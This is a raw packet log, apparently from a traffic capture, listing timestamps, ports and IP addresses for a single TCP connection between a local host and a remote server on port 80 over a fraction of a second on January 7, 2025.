Jan 7, 2025 10:09:02.401567936 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.401576042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.401593924 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.401671886 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.401690006 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.401701927 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.401712894 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.401741028 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.401746035 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.401751995 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.401752949 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.401777983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.401789904 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.401802063 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.401802063 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.401842117 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.401861906 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.402357101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.402410030 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.402420998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.402462959 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.402491093 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.402514935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.402525902 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.402569056 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.402569056 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.402582884 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.402594090 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.402602911 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.402645111 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.402645111 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.434096098 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.434113979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.434124947 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.434165001 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.434176922 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.434184074 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.434184074 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.434204102 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.434215069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.434226990 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.434355021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.434366941 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.434382915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.434393883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.434405088 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.434407949 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.434407949 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.434417009 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.434428930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.434447050 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.434475899 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.438724041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.438746929 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.438759089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.438781977 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.438795090 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.438807011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.438810110 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.438837051 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.438848972 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.438855886 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.438859940 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.438894033 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.438920021 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.460688114 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.460697889 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.460720062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.460731030 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.460741043 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.460782051 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.460794926 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.460804939 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.460819006 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.460870028 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.486601114 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.486618996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.486630917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.486641884 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.486653090 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.486663103 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.486692905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.486701965 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.486711979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.486723900 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.486736059 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.486756086 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.486767054 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.486771107 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.486771107 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.486779928 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.486825943 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.486825943 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.486825943 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.486843109 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.486855030 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.486865997 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.486895084 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.486926079 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.486927032 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.486939907 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.486952066 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.486958027 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.486968994 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.486987114 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.486999035 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487004042 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.487011909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487045050 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.487045050 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.487076998 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.487082005 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487092972 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487106085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487123013 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487137079 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487148046 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487163067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487173080 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487174034 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.487174034 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.487186909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487198114 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487241983 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.487241983 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.487241983 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.487252951 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.487265110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487282991 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487297058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487306118 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487329960 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487334013 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.487343073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487354040 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.487400055 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.487416983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487430096 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487440109 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487452984 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487463951 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487490892 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.487490892 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.487528086 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487539053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487550020 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487550974 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.487565041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487577915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487588882 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487588882 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.487603903 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.487623930 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.487648010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487654924 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.487662077 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487674952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487715006 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.487735987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487750053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487761021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487765074 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.487771988 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487790108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487799883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487807035 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.487812042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487832069 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.487845898 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487848997 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.487859011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487874031 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487888098 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487898111 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487929106 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.487929106 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.487936974 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487966061 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.487966061 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.487984896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.487994909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.488001108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.488012075 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.488034010 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.488042116 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.488054037 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.488065004 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.488075018 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.488090992 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.488116980 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.488318920 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.488341093 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.488351107 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.488362074 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.488389969 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.488406897 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.488410950 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.488420010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.488432884 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.488445044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.488487005 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.488507032 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.488533974 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.489083052 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.489100933 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.489121914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.489145041 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.489166021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.489168882 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.489177942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.489207029 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.489234924 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.489253044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.489264011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.489274979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.489322901 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.520854950 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.520891905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.520903111 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.520951986 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.520971060 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.520981073 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.520983934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.520996094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.521013975 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.521015882 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.521025896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.521033049 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.521038055 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.521056890 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.521066904 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.521075010 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.521087885 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.521099091 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.521111012 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.521121025 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.521130085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.521143913 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.521167040 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.521225929 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.525609016 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.525619984 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.525625944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.525667906 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.525680065 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.525680065 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.525696039 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.525707960 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.525716066 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.525729895 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.525742054 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.547437906 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.547450066 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.547456026 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.547470093 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.547482014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.547502995 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.547533035 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.547537088 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.547544956 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.547583103 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.547601938 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.573537111 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.573550940 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.573560953 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.573601961 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.573612928 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.573612928 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.573612928 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.573625088 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.573657036 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.573671103 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.573688984 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.573700905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.573710918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.573723078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.573749065 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.573775053 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.573786974 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.573798895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.573831081 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.573849916 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.573863029 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.573873997 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.573919058 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.573935032 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.573946953 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.573957920 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.573968887 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.574002981 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.574002981 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.574024916 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.574035883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.574048042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.574076891 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.574086905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.574091911 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.574100971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.574106932 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.574111938 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.574135065 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.574147940 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.574178934 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.574239969 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.574249983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.574260950 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.574273109 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.574284077 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.574302912 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.574328899 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.574340105 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.574352026 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.574362993 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.574374914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.574385881 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.574393988 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.574414015 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.574435949 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.574444056 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.574449062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.574460030 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.574470997 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.574484110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.574492931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.574498892 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.574528933 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.574557066 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.574587107 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.574598074 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.574609995 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.574620008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.574629068 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.574640036 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.574640989 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.574651957 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.574665070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.574675083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.574676991 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:02.574687958 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:02.574700117 CET	80	50017	31.41.244.11	192.168.2.4
